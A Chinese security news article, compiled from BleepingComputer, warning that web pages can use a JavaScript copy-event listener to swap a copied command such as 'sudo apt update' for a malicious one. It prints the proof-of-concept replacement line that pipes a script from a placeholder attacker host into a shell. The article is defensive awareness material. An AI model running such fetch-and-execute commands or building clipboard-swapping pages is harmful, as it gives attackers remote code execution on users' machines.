千万别从网页复制粘贴命令
聚焦源代码安全,网罗国内外最新资讯!
编译:代码卫士
程序员、系统管理员、安全研究员和技术爱好者门,从网页将命令复制粘贴到控制台或终端可能会导致系统遭攻陷。
安全意识培训平台 Wizer 的创始人 Gabriel Friedlander 最近展示了一个简单但令人惊讶的hack 技术,可能会让所有人从网页复制粘贴命令时三思。
很多人会从网页如 StackOverflow 等复制常用命令并粘贴到应用程序、Windows 命令提示符或Linux 终端。但 Friedlander 提醒称网页可能会秘密取代剪贴板上的内容,用户最终可能会复制恶意内容。更糟糕的是,没有必要的尽职调查,开发人员可能会在粘贴文本之后才会发现错误,但为时已晚。
Friedlander 在博客文章中发布简单的 PoC,请读者复制一个多数系统管理员和开发人员都熟悉的简单命令:
sudo apt update
接下来,将他提供的命令粘贴到文本或 Notepad 中,结果可能会让你大惊失色:
curl http://attacker-domain:8000/shell.sh | sh
用户不仅在剪贴板上粘贴了一个完全不同的命令,而且更糟糕的是,结尾还有一个新行(或return)字符。
这说明,只要将上面的实例直接粘贴到 Linux 中断,它就会立即执行。这和用户的想法大相径庭。
原因是什么?
原因在于 Friedlander 设置的 PoC HTML 页面背后隐藏的 JavaScript 代码中。只要复制HTML 元素中包含的 “sudo apt update” 文本,下面所示的代码片段就会运行。之后,JavaScript的“事件监听”会捕获复制事件并用Friedlander 的恶意测试代码取代剪贴板上的数据。
需要注意的是,事件监听器具有多个 JavaScrip 合法用例,但本案例只是它们可被滥用的例子之一。
Friedlander 提醒称,“这就是为何永远不要直接将命令直接复制粘贴到中断的原因所在。”他表示用户复制粘贴的可能是恶意代码,攻击者只需将一行代码注入所复制的代码中,就可创建后门。他指出,“攻击虽然非常简单但危害非常大”。
这是一个简单但非常重要的日常安全经验教训。
推荐阅读
总是忍不住复制粘贴开源代码会被炒吗?在线等,挺急的
还在复制粘贴密币地址?小心财产不翼而飞啊
谷歌搜索隐私漏洞:复制粘贴搜索结果URL会泄露此前搜索行为
原文链接
https://www.bleepingcomputer.com/news/security/dont-copy-paste-commands-from-webpages-you-can-get-hacked/
题图:Pixabay License
本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。
奇安信代码卫士 (codesafe)
国内首个专注于软件开发安全的产品线。
觉得不错,就点个 “在看” 或 "赞” 吧~
千万别从网页复制粘贴命令相关推荐
- vi/vim的选中/复制/粘贴命令
原文: https://www.cnblogs.com/GlassHour/p/5503973.html GlassHour vi/vim的选中/复制/粘贴命令 选自http://blog.csdn. ...
- 如何去掉/消除网页复制粘贴后带到word或WPS文档中的浅灰色背景
如何去掉/消除网页复制粘贴后带到word或WPS文档中的浅灰色背景 从网页或者其它地方复制过来的文字,有时候背景会呈浅灰色,但并非是"突出显示"或是设置了背景颜色,只有有文字的地方 ...
- (只需挨个复制粘贴命令即可部署)在Centos7下搭建文件服务器(VSFTPD)
观看北京尚学堂-百战程序员笔记 一.VSFTPD简介 Linux的组件(一款软件),安装到Linux后可以通过java代码(FtpClient)实现文件的上传.基于FTP协议. 由于VSFTPD是基于 ...
- gvim 命令行粘贴_vi/vim复制粘贴命令
1. 选定文本块.使用v进入可视模式,移动光标键选定内容. 2.复制的命令是y,即yank(提起) ,常用的命令如下: y 在使用v模式选定了某一块的时候,复制选定块到缓冲区用: yy ...
- Linux系统之复制粘贴命令
Linux下复制粘贴快捷键 在控制台下: 鼠标选中要复制的文本,按鼠标中键,即为复制 复制命令:Ctrl + Insert 组合键 或 用鼠标选中即是复制. 粘贴命令:Shift + Inse ...
- vi/vim中复制粘贴命令
1. 选定文本块.使用v进入可视模式,移动光标键选定内容. 2.复制的命令是y,即yank(提起) ,常用的命令如下: y 在使用v模式选定了某一块的时候,复制选定块到缓冲区用: ...
- linux vim yny复制粘贴,vi/vim复制粘贴命令
1. 选定文本块.使用v进入可视模式,移动光标键选定内容. 2.复制的命令是y,即yank(提起) ,常用的命令如下: y 在使用v模式选定了某一块的时候,复制选定块到缓冲区用: yy ...
- vi/vim复制粘贴命令
1. 选定文本块.使用v进入可视模式,移动光标键选定内容. 2.复制的命令是y,即yank(提起) ,常用的命令如下: y 在使用v模式选定了某一块的时候,复制选定块到缓冲区用: ...
- (一)Linux中vi的复制粘贴命令
vi编辑器有3种模式:命令模式.输入模式.末行模式.掌握这三种模式十分重要: 命令模式:vi启动后默认进入的是命令模式,从这个模式使用命令可以切换到另外两种模式,同时无论在任何模式下只要按一下[Esc ...
最新文章
- python零基础电子书免费下载-零基础学Python
- 什么是ATM(异步传输模式)?—Vecloud微云
- Spring基于注解的AOP配置
- SUSE Linux维护笔记三
- 目标检测系列(八)——CenterNet:Objects as points
- 三星笔记本进入BIOS后找不到U盘启动项/快速启动键F12没有反应
- 帝国CMS后台getshell
- Top Down Operator Precedence - 自顶向下算符优先分析法
- windows server 2003安装pc套件ovi套件全过程?
- JS,CSS是前端,JAVA PHP ASP是后端,数据库是后端的处理对象,非代表前后底
- 【Django BUG 已解决】You must either define the environment variable DJANGO_SETTINGS_MODULE or call ...
- C++模板偏特化和全特化
- 启动进程失败,端口被占用处理方法!
- 在群晖 DSM 7.0 系统上如何安装 Plex Media Server
- (二)计算机取证-案件确认书及证据表
- 比赛之前的最后一点点总结
- 网易我的世界服务器怎么显示键盘,网易我的世界指令怎么用(常见的指令及使用方式)...
- 淘宝 Android 端图片体验优化实践
- 【MySQL】修改配置后,重启MySQL报错[ERROR] The server quit without updating PID file
- 利用加速度求解位置的算法——三轴传感器